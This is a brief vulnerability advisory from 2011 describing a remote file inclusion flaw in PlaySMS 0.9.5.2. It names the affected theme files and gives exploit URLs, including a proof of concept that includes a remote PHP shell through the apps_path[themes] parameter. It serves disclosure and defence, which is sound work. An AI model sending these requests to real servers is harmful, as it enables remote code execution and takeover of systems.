PlaySMS version 0.9.5.2 suffers from a remote file inclusion vulnerability.
049d929227d9b1ba69f2be7c46c93737841bda264acecb9025eeb86fa0fd2db9
=============================================================================================================
[o] PlaySMS <= Remote File Inclusion Vulnerability
Software : PlaySMS ver 0.9.5.2
Vendor : https://playsms.org/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : https://evilc0de.blogspot.com/
=============================================================================================================
[o] Vulnerability
<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>
affected all this files
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Exploit
https://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] PoC
https://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=https://phpshell?
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] September 05 2011 - Papua, Indonesia